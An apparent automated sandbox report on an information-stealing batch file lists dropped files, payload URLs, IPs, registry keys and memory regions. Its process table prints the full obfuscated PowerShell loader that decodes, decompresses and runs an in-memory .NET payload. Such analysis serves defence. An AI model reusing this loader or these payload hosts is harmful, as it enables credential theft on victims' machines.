IOC Report
849128312.cmd

loading gif

Files

File Path
Type
Category
Malicious
849128312.cmd
Unicode text, UTF-8 text, with very long lines (33620), with CRLF, CR line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
modified
malicious
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hi5ebuqc.skg.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s1xryabt.rdz.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\Desktop\849128312.cmd.Fjz
PE32 executable (console) Intel 80386, for MS Windows
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\849128312.cmd" "
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo F "
malicious
C:\Users\user\Desktop\849128312.cmd.Fjz
C:\Users\user\Desktop\849128312.cmd.Fjz -WindowStyle hidden -command "$Kxrvrz = get-content 'C:\Users\user\Desktop\849128312.cmd' | Select-Object -Last 1; $Rztxxaika = [System.Convert]::FromBase64String($Kxrvrz);$Jjvgcfjmzi = New-Object System.IO.MemoryStream( , $Rztxxaika );$Cheoysx = New-Object System.IO.MemoryStream;$Vrypedkztmk = New-Object System.IO.Compression.GzipStream $Jjvgcfjmzi, ([IO.Compression.CompressionMode]::Decompress);$Vrypedkztmk.CopyTo( $Cheoysx );$Vrypedkztmk.Close();$Jjvgcfjmzi.Close();[byte[]] $Rztxxaika = $Cheoysx.ToArray();[Array]::Reverse($Rztxxaika); $Nlmpmdzvlef = [System.AppDomain]::CurrentDomain.Load($Rztxxaika); $Hncpdnhhl = $Nlmpmdzvlef.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Hncpdnhhl.DeclaringType, $Hncpdnhhl.Name).DynamicInvoke() | Out-Null"
malicious
C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe
"C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\chcp.com
chcp 65001
C:\Windows\System32\xcopy.exe
xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\849128312.cmd.Fjz
C:\Windows\System32\attrib.exe
attrib +s +h C:\Users\user\Desktop\849128312.cmd.Fjz
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 2268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1144
There are 2 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://nuget.org/NuGet.exe
unknown
https://bbuseruploads.s3.amazonaws.com
unknown
https://stackoverflow.com/q/14436606/23354
unknown
https://github.com/mgravell/protobuf-netJ
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://crl.microsoft
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://web-security-reports.services.atlassian.com/csp-report/bb-website
unknown
https://bbuseruploads.s3.amazonaws.com/871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b1e8acb6-ab61-
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://github.com/mgravell/protobuf-net
unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
unknown
https://bitbucket.org/312351234123/12312312412adsada/downloads/Gqjmdstn.pdf
185.166.143.48
https://dz8aopenkvv6s.cloudfront.net
unknown
https://github.com/Pester/Pester
unknown
https://bitbucket.org/312351234123/12312312412adsada/downloads/Gqjmdstn.pdfv
unknown
https://bbuseruploads.s3.amazonaws.com/871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/3e10a657-95f6-
unknown
https://bbuseruploads.s3.amazonaws.com/871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/ad174d1e-b961-
unknown
https://github.com/mgravell/protobuf-neti
unknown
https://aka.ms/pscore6lB
unknown
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
unknown
https://stackoverflow.com/q/11564914/23354;
unknown
https://stackoverflow.com/q/2152978/23354
unknown
https://bitbucket.org/312351234123/12312312412adsada/downloads/Hgjcrxfnz.mp3
185.166.143.48
https://cdn.cookielaw.org/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://aui-cdn.atlassian.com/
unknown
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
unknown
https://bitbucket.org/312351234123/12312312412adsada/downloads/Llbodzuyqnk.wav
185.166.143.48
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://bitbucket.org
unknown
There are 24 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
s3-w.us-east-1.amazonaws.com
54.231.171.137
malicious
bitbucket.org
185.166.143.48
bbuseruploads.s3.amazonaws.com
unknown

IPs

IP
Domain
Country
Malicious
3.5.27.130
unknown
United States
malicious
54.231.171.137
s3-w.us-east-1.amazonaws.com
United States
malicious
185.166.143.48
bitbucket.org
Germany

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\849128312_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\849128312_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\849128312_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\849128312_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\849128312_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\849128312_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\849128312_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\849128312_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\849128312_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\849128312_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\849128312_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\849128312_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\849128312_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\849128312_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\stealer-CR-0110_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\stealer-CR-0110_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\stealer-CR-0110_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\stealer-CR-0110_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\stealer-CR-0110_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\stealer-CR-0110_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\stealer-CR-0110_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\stealer-CR-0110_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\stealer-CR-0110_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\stealer-CR-0110_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\stealer-CR-0110_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\stealer-CR-0110_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\stealer-CR-0110_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\stealer-CR-0110_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS
FileDirectory
There are 33 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
7130000
trusted library section
page read and write
malicious
5EDF000
trusted library allocation
page read and write
malicious
87C0000
trusted library section
page read and write
malicious
4EEA000
trusted library allocation
page read and write
malicious
28E0000
trusted library allocation
page read and write
malicious
54C8000
trusted library allocation
page read and write
29A3000
trusted library allocation
page read and write
2AF9000
trusted library allocation
page read and write
4E68000
trusted library allocation
page read and write
507B000
trusted library allocation
page read and write
24050FE0000
heap
page read and write
5735000
trusted library allocation
page read and write
54D5000
trusted library allocation
page read and write
2A5E000
trusted library allocation
page read and write
2B23000
trusted library allocation
page read and write
8F7000
trusted library allocation
page execute and read and write
5550000
trusted library allocation
page read and write
2AF5000
trusted library allocation
page read and write
2E61000
trusted library allocation
page read and write
2863000
trusted library allocation
page read and write
56AF000
trusted library allocation
page read and write
29BC000
trusted library allocation
page read and write
B20000
heap
page read and write
5669000
trusted library allocation
page read and write
DB24FE000
stack
page read and write
910000
heap
page read and write
549D000
stack
page read and write
2A80000
trusted library allocation
page read and write
50AA000
trusted library allocation
page read and write
54A8000
trusted library allocation
page read and write
5380000
trusted library allocation
page read and write
2EA8000
trusted library allocation
page read and write
915000
heap
page read and write
3919000
trusted library allocation
page read and write
55F0000
trusted library allocation
page read and write
54DB000
trusted library allocation
page read and write
5609000
trusted library allocation
page read and write
51B7000
trusted library allocation
page read and write
2A2E000
trusted library allocation
page read and write
5B71000
trusted library allocation
page read and write
1370000
trusted library allocation
page read and write
2E48000
trusted library allocation
page read and write
4980000
heap
page read and write
5629000
trusted library allocation
page read and write
2E50000
trusted library allocation
page read and write
550F000
trusted library allocation
page read and write
2D97000
trusted library allocation
page read and write
5204000
trusted library allocation
page read and write
50BB000
trusted library allocation
page read and write
520C000
trusted library allocation
page read and write
5042000
trusted library allocation
page read and write
2ADA000
trusted library allocation
page read and write
2ADE000
trusted library allocation
page read and write
4FFD000
stack
page read and write
53FD000
trusted library allocation
page read and write
D77000
heap
page read and write
8077000
stack
page read and write
2E4A000
trusted library allocation
page execute and read and write
54CA000
trusted library allocation
page read and write
56F2000
trusted library allocation
page read and write
2AB3000
trusted library allocation
page read and write
5739000
trusted library allocation
page read and write
D04000
trusted library allocation
page read and write
2E92000
trusted library allocation
page read and write
D26000
trusted library allocation
page execute and read and write
5B8E000
stack
page read and write
2C2E000
stack
page read and write
2AE0000
trusted library allocation
page read and write
2E99000
trusted library allocation
page read and write
4945000
trusted library allocation
page execute and read and write
2A13000
trusted library allocation
page read and write
8B0000
trusted library allocation
page read and write
2A9C000
trusted library allocation
page read and write
24E0000
trusted library allocation
page read and write
6CAE000
stack
page read and write
582E000
stack
page read and write
9B3000
heap
page read and write
4ED1000
trusted library allocation
page read and write
2A37000
trusted library allocation
page read and write
5BDB000
trusted library allocation
page read and write
518D000
trusted library allocation
page read and write
2AC6000
trusted library allocation
page read and write
2E58000
trusted library allocation
page read and write
5078000
trusted library allocation
page read and write
10EA000
heap
page read and write
567A000
trusted library allocation
page read and write
5656000
trusted library allocation
page read and write
5695000
trusted library allocation
page read and write
2E1E000
trusted library allocation
page read and write
6DC0000
trusted library allocation
page read and write
526F000
trusted library allocation
page read and write
556D000
trusted library allocation
page read and write
1380000
heap
page read and write
5437000
trusted library allocation
page read and write
2D9E000
stack
page read and write
5294000
trusted library allocation
page read and write
2D1F000
trusted library allocation
page read and write
4CE0000
heap
page read and write
2B4A000
trusted library allocation
page read and write
50F5000
trusted library allocation
page read and write
2E90000
trusted library allocation
page read and write
2BA0000
trusted library allocation
page read and write
524C000
trusted library allocation
page read and write
51A8000
trusted library allocation
page read and write
2B08000
trusted library allocation
page read and write
8D3000
heap
page read and write
10A0000
heap
page read and write
288B000
trusted library allocation
page read and write
56A3000
trusted library allocation
page read and write
528C000
trusted library allocation
page read and write
6C60000
heap
page execute and read and write
2AF1000
trusted library allocation
page read and write
2E75000
trusted library allocation
page read and write
5005000
trusted library allocation
page read and write
820000
heap
page read and write
7630000
trusted library allocation
page read and write
56D7000
trusted library allocation
page read and write
4970000
trusted library allocation
page read and write
550B000
trusted library allocation
page read and write
5033000
trusted library allocation
page read and write
154439B0000
heap
page read and write
29C3000
trusted library allocation
page read and write
29C7000
trusted library allocation
page read and write
54CF000
trusted library allocation
page read and write
560B000
trusted library allocation
page read and write
29DF000
trusted library allocation
page read and write
4FE4000
trusted library allocation
page read and write
4FCD000
trusted library allocation
page read and write
2B83000
trusted library allocation
page read and write
2A73000
trusted library allocation
page read and write
2B64000
trusted library allocation
page read and write
1080000
trusted library allocation
page read and write
52BC000
trusted library allocation
page read and write
605E000
stack
page read and write
9E4000
heap
page read and write
7620000
trusted library allocation
page read and write
50EE000
stack
page read and write
536E000
stack
page read and write
4AB0000
trusted library allocation
page execute and read and write
2BB3000
trusted library allocation
page read and write
5705000
trusted library allocation
page read and write
2B6A000
trusted library allocation
page read and write
4E65000
trusted library allocation
page read and write
2B75000
trusted library allocation
page read and write
2E22000
trusted library allocation
page read and write
53F4000
trusted library allocation
page read and write
2640000
trusted library allocation
page execute and read and write
2AC0000
heap
page read and write
5459000
trusted library allocation
page read and write
50EF000
trusted library allocation
page read and write
109D000
trusted library allocation
page execute and read and write
A74000
unkown
page readonly
5C12000
heap
page read and write
7470000
trusted library allocation
page read and write
5181000
trusted library allocation
page read and write
5545000
trusted library allocation
page read and write
5174000
trusted library allocation
page read and write
51AA000
trusted library allocation
page read and write
3212000
trusted library allocation
page read and write
50B7000
trusted library allocation
page read and write
2AE7000
trusted library allocation
page read and write
2AFD000
trusted library allocation
page read and write
7600000
trusted library allocation
page read and write
D1D000
trusted library allocation
page execute and read and write
25D0000
trusted library allocation
page execute and read and write
2B8B000
trusted library allocation
page read and write
2E20000
trusted library allocation
page read and write
556F000
trusted library allocation
page read and write
5401000
trusted library allocation
page read and write
3E61000
trusted library allocation
page read and write
2A11000
trusted library allocation
page read and write
1093000
trusted library allocation
page execute and read and write
2E24000
trusted library allocation
page read and write
7222000
heap
page read and write
523D000
trusted library allocation
page read and write
7610000
trusted library allocation
page read and write
56B2000
trusted library allocation
page read and write
2E5F000
stack
page read and write
4CC6000
trusted library allocation
page read and write
2A3F000
trusted library allocation
page read and write
5298000
trusted library allocation
page read and write
9000000
heap
page read and write
2E8C000
trusted library allocation
page read and write
263E000
stack
page read and write
2BD2000
trusted library allocation
page read and write
5622000
trusted library allocation
page read and write
6BAD000
stack
page read and write
2E3F000
trusted library allocation
page read and write
5561000
trusted library allocation
page read and write
50C1000
trusted library allocation
page read and write
502D000
trusted library allocation
page read and write
574E000
trusted library allocation
page read and write
D6A000
heap
page read and write
2872000
trusted library allocation
page read and write
61DE000
stack
page read and write
90B000
trusted library allocation
page execute and read and write
74E0000
trusted library allocation
page read and write
53E8000
trusted library allocation
page read and write
5ECE000
stack
page read and write
5480000
trusted library allocation
page read and write
2DE4000
trusted library allocation
page read and write
4FA0000
heap
page execute and read and write
5513000
trusted library allocation
page read and write
2A75000
trusted library allocation
page read and write
521D000
trusted library allocation
page read and write
2B44000
trusted library allocation
page read and write
834F000
stack
page read and write
5031000
trusted library allocation
page read and write
51E0000
trusted library allocation
page read and write
320E000
trusted library allocation
page read and write
541C000
trusted library allocation
page read and write
5208000
trusted library allocation
page read and write
29A5000
trusted library allocation
page read and write
64C273E000
stack
page read and write
F39000
stack
page read and write
2CD3000
heap
page read and write
5072000
trusted library allocation
page read and write
A11000
unkown
page execute read
5151000
trusted library allocation
page read and write
2A8E000
trusted library allocation
page read and write
4ED5000
trusted library allocation
page read and write
5450000
trusted library allocation
page read and write
2B12000
trusted library allocation
page read and write
2E94000
trusted library allocation
page read and write
52A5000
trusted library allocation
page read and write
4ACE000
stack
page read and write
29AC000
trusted library allocation
page read and write
57AE000
stack
page read and write
2EA1000
trusted library allocation
page read and write
505D000
trusted library allocation
page read and write
2A0F000
trusted library allocation
page read and write
4B60000
heap
page execute and read and write
55F2000
trusted library allocation
page read and write
71EF000
stack
page read and write
5403000
trusted library allocation
page read and write
5D19000
trusted library allocation
page read and write
5C44000
heap
page read and write
29D3000
trusted library allocation
page read and write
400000
remote allocation
page execute and read and write
404000
remote allocation
page execute and read and write
758000
stack
page read and write
5643000
trusted library allocation
page read and write
5717000
trusted library allocation
page read and write
5567000
trusted library allocation
page read and write
7480000
trusted library allocation
page read and write
29F6000
trusted library allocation
page read and write
2E1C000
trusted library allocation
page read and write
29FA000
trusted library allocation
page read and write
81F0000
trusted library allocation
page read and write
264D000
stack
page read and write
50BD000
trusted library allocation
page read and write
563B000
trusted library allocation
page read and write
527D000
trusted library allocation
page read and write
2E3B000
trusted library allocation
page read and write
2DB6000
trusted library allocation
page read and write
5E80000
heap
page read and write
2E03000
trusted library allocation
page read and write
4FE6000
trusted library allocation
page read and write
520A000
trusted library allocation
page read and write
6E56000
heap
page read and write
4988000
heap
page read and write
55EC000
trusted library allocation
page read and write
5012000
trusted library allocation
page read and write
29E6000
trusted library allocation
page read and write
2DD5000
trusted library allocation
page read and write
5D70000
trusted library allocation
page read and write
553D000
trusted library allocation
page read and write
4FC9000
trusted library allocation
page read and write
5763000
trusted library allocation
page read and write
51F6000
trusted library allocation
page read and write
7310000
trusted library allocation
page read and write
532E000
stack
page read and write
8130000
heap
page read and write
578B000
trusted library allocation
page read and write
2A98000
trusted library allocation
page read and write
4940000
trusted library allocation
page read and write
2C37000
trusted library allocation
page execute and read and write
2B42000
trusted library allocation
page read and write
2A24000
trusted library allocation
page read and write
50A6000
trusted library allocation
page read and write
29A9000
trusted library allocation
page read and write
2DCD000
trusted library allocation
page read and write
2DE8000
trusted library allocation
page read and write
7490000
trusted library allocation
page read and write
6D3D000
stack
page read and write
2C4B000
trusted library allocation
page execute and read and write
578F000
trusted library allocation
page read and write
2EBD000
trusted library allocation
page read and write
8FA000
trusted library allocation
page execute and read and write
572E000
stack
page read and write
5193000
trusted library allocation
page read and write
2A4B000
trusted library allocation
page read and write
5001000
trusted library allocation
page read and write
25D2000
trusted library allocation
page read and write
5341000
heap
page read and write
6BEE000
stack
page read and write
5189000
trusted library allocation
page read and write
2A9A000
trusted library allocation
page read and write
51C9000
trusted library allocation
page read and write
2E25000
trusted library allocation
page read and write
9ED000
heap
page read and write
525A000
trusted library allocation
page read and write
95D000
heap
page read and write
54FE000
trusted library allocation
page read and write
5003000
trusted library allocation
page read and write
514F000
trusted library allocation
page read and write
6D7B000
stack
page read and write
154439D5000
heap
page read and write
24051134000
heap
page read and write
2E52000
trusted library allocation
page read and write
5637000
trusted library allocation
page read and write
2ED2000
trusted library allocation
page read and write
54E3000
trusted library allocation
page read and write
54C2000
trusted library allocation
page read and write
569B000
trusted library allocation
page read and write
2A62000
trusted library allocation
page read and write
51CE000
trusted library allocation
page read and write
56C4000
trusted library allocation
page read and write
6DA0000
trusted library allocation
page read and write
5454000
trusted library allocation
page read and write
51E7000
trusted library allocation
page read and write
59BD000
stack
page read and write
50C3000
trusted library allocation
page read and write
521F000
trusted library allocation
page read and write
50DA000
trusted library allocation
page read and write
8480000
heap
page execute and read and write
2DBE000
trusted library allocation
page read and write
2F36000
trusted library allocation
page read and write
2E8A000
trusted library allocation
page read and write
29D7000
trusted library allocation
page read and write
2F10000
trusted library allocation
page read and write
52EA000
trusted library allocation
page read and write
2CAE000
stack
page read and write
56C0000
trusted library allocation
page read and write
1020000
heap
page read and write
6DC000
stack
page read and write
4FCF000
trusted library allocation
page read and write
FF3000
heap
page read and write
5300000
trusted library allocation
page read and write
15443A28000
heap
page read and write
2EB2000
trusted library allocation
page read and write
24050E1C000
heap
page read and write
56C2000
trusted library allocation
page read and write
49B0000
trusted library allocation
page read and write
5699000
trusted library allocation
page read and write
2A92000
trusted library allocation
page read and write
2BD6000
trusted library allocation
page read and write
29D9000
trusted library allocation
page read and write
15443A20000
heap
page read and write
2A79000
trusted library allocation
page read and write
2BB9000
trusted library allocation
page read and write
2670000
trusted library allocation
page read and write
5155000
trusted library allocation
page read and write
2E73000
trusted library allocation
page read and write
5607000
trusted library allocation
page read and write
E3C000
stack
page read and write
4D05000
trusted library allocation
page read and write
2A47000
trusted library allocation
page read and write
2E88000
trusted library allocation
page read and write
5571000
trusted library allocation
page read and write
29F2000
trusted library allocation
page read and write
5121000
trusted library allocation
page read and write
550D000
trusted library allocation
page read and write
15443A00000
heap
page read and write
56C6000
trusted library allocation
page read and write
640000
unkown
page readonly
2B1D000
trusted library allocation
page read and write
52D1000
trusted library allocation
page read and write
4F8E000
stack
page read and write
93A0000
trusted library allocation
page execute and read and write
5016000
trusted library allocation
page read and write
8080000
heap
page read and write
2BBB000
trusted library allocation
page read and write
2E40000
trusted library allocation
page read and write
2E5D000
trusted library allocation
page read and write
601F000
stack
page read and write
4970000
heap
page readonly
50AF000
stack
page read and write
528A000
trusted library allocation
page read and write
A10000
unkown
page readonly
520E000
trusted library allocation
page read and write
5620000
trusted library allocation
page read and write
2E1A000
trusted library allocation
page read and write
56FC000
trusted library allocation
page read and write
983000
heap
page read and write
8D0000
heap
page read and write
2B87000
trusted library allocation
page read and write
502F000
trusted library allocation
page read and write
2E01000
trusted library allocation
page read and write
25D7000
trusted library allocation
page execute and read and write
2AB0000
heap
page read and write
25EF000
trusted library allocation
page read and write
5422000
trusted library allocation
page read and write
2BC0000
trusted library allocation
page read and write
2DB0000
trusted library allocation
page read and write
501D000
trusted library allocation
page read and write
2AF3000
trusted library allocation
page read and write
5569000
trusted library allocation
page read and write
2A60000
trusted library allocation
page read and write
6E50000
heap
page read and write
5667000
trusted library allocation
page read and write
15443A2A000
heap
page read and write
280A000
trusted library allocation
page read and write
548F000
trusted library allocation
page read and write
2BB7000
trusted library allocation
page read and write
6380000
heap
page read and write
50CA000
trusted library allocation
page read and write
5199000
trusted library allocation
page read and write
CDF000
stack
page read and write
2DD3000
trusted library allocation
page read and write
547E000
trusted library allocation
page read and write
5046000
trusted library allocation
page read and write
2B4F000
trusted library allocation
page read and write
782000
remote allocation
page execute and read and write
506C000
trusted library allocation
page read and write
52CF000
trusted library allocation
page read and write
86E000
stack
page read and write
2B96000
trusted library allocation
page read and write
2E5A000
heap
page read and write
80A0000
trusted library allocation
page read and write
552E000
trusted library allocation
page read and write
91A000
heap
page read and write
8FC2000
heap
page read and write
86E0000
trusted library section
page read and write
2E10000
trusted library allocation
page read and write
9DF000
heap
page read and write
8870000
trusted library allocation
page read and write
6D21000
trusted library allocation
page read and write
2DCF000
trusted library allocation
page read and write
2B73000
trusted library allocation
page read and write
5752000
trusted library allocation
page read and write
FEE000
stack
page read and write
865E000
stack
page read and write
8E50000
trusted library allocation
page execute and read and write
5A4E000
stack
page read and write
5614000
trusted library allocation
page read and write
2DFF000
trusted library allocation
page read and write
5580000
heap
page read and write
53DE000
trusted library allocation
page read and write
2E96000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
4FFD000
trusted library allocation
page read and write
2A2A000
trusted library allocation
page read and write
5C30000
heap
page read and write
2BA2000
trusted library allocation
page read and write
2B29000
trusted library allocation
page read and write
D30000
heap
page read and write
5247000
trusted library allocation
page read and write
8CD000
trusted library allocation
page execute and read and write
55AF000
stack
page read and write
2B48000
trusted library allocation
page read and write
5603000
trusted library allocation
page read and write
5467000
trusted library allocation
page read and write
2E5A000
trusted library allocation
page read and write
2AFB000
trusted library allocation
page read and write
2B68000
trusted library allocation
page read and write
52B6000
trusted library allocation
page read and write
5277000
trusted library allocation
page read and write
7640000
trusted library allocation
page read and write
2B89000
trusted library allocation
page read and write
2AC3000
trusted library allocation
page read and write
2A96000
trusted library allocation
page read and write
5427000
trusted library allocation
page read and write
2690000
heap
page read and write
2AE7000
heap
page read and write
5641000
trusted library allocation
page read and write
D22000
trusted library allocation
page read and write
609F000
stack
page read and write
527B000
trusted library allocation
page read and write
5153000
trusted library allocation
page read and write
2E8E000
trusted library allocation
page read and write
2E12000
trusted library allocation
page read and write
10E1000
heap
page read and write
2BDA000
trusted library allocation
page read and write
2AE2000
trusted library allocation
page read and write
546E000
stack
page read and write
5713000
trusted library allocation
page read and write
BD0000
heap
page read and write
2BF7000
trusted library allocation
page read and write
2E2F000
trusted library allocation
page read and write
735D000
heap
page read and write
29BA000
trusted library allocation
page read and write
56E1000
trusted library allocation
page read and write
2BEF000
trusted library allocation
page read and write
7660000
trusted library allocation
page read and write
56DB000
trusted library allocation
page read and write
5409000
trusted library allocation
page read and write
2C90000
heap
page read and write
2EAE000
trusted library allocation
page read and write
6DD0000
trusted library allocation
page read and write
5C10000
heap
page read and write
52DA000
trusted library allocation
page read and write
2E4E000
trusted library allocation
page read and write
FA0000
heap
page read and write
3831000
trusted library allocation
page read and write
2AD4000
trusted library allocation
page read and write
5C14000
heap
page read and write
2E56000
trusted library allocation
page read and write
5493000
trusted library allocation
page read and write
2EA5000
trusted library allocation
page read and write
5793000
trusted library allocation
page read and write
5035000
trusted library allocation
page read and write
50A8000
trusted library allocation
page read and write
5697000
trusted library allocation
page read and write
5271000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
52CD000
trusted library allocation
page read and write
817E000
stack
page read and write
51B1000
trusted library allocation
page read and write
5407000
trusted library allocation
page read and write
2B27000
trusted library allocation
page read and write
5420000
trusted library allocation
page read and write
2A64000
trusted library allocation
page read and write
53EA000
trusted library allocation
page read and write
2BF5000
trusted library allocation
page read and write
2E30000
trusted library allocation
page read and write
26D0000
trusted library allocation
page read and write
1000000
heap
page read and write
52BE000
trusted library allocation
page read and write
5756000
trusted library allocation
page read and write
B8E000
stack
page read and write
5074000
trusted library allocation
page read and write
2C13000
heap
page read and write
56C8000
trusted library allocation
page read and write
2B0A000
trusted library allocation
page read and write
5611000
trusted library allocation
page read and write
51EB000
trusted library allocation
page read and write
73F8000
heap
page read and write
5626000
trusted library allocation
page read and write
2B0E000
trusted library allocation
page read and write
2DAA000
trusted library allocation
page read and write
2EA9000
trusted library allocation
page read and write
2B51000
trusted library allocation
page read and write
3838000
trusted library allocation
page read and write
518F000
trusted library allocation
page read and write
29D1000
trusted library allocation
page read and write
2B6E000
trusted library allocation
page read and write
544C000
trusted library allocation
page read and write
53F0000
trusted library allocation
page read and write
7440000
trusted library allocation
page read and write
509A000
trusted library allocation
page read and write
569D000
trusted library allocation
page read and write
2A31000
trusted library allocation
page read and write
55EE000
stack
page read and write
2A94000
trusted library allocation
page read and write
517E000
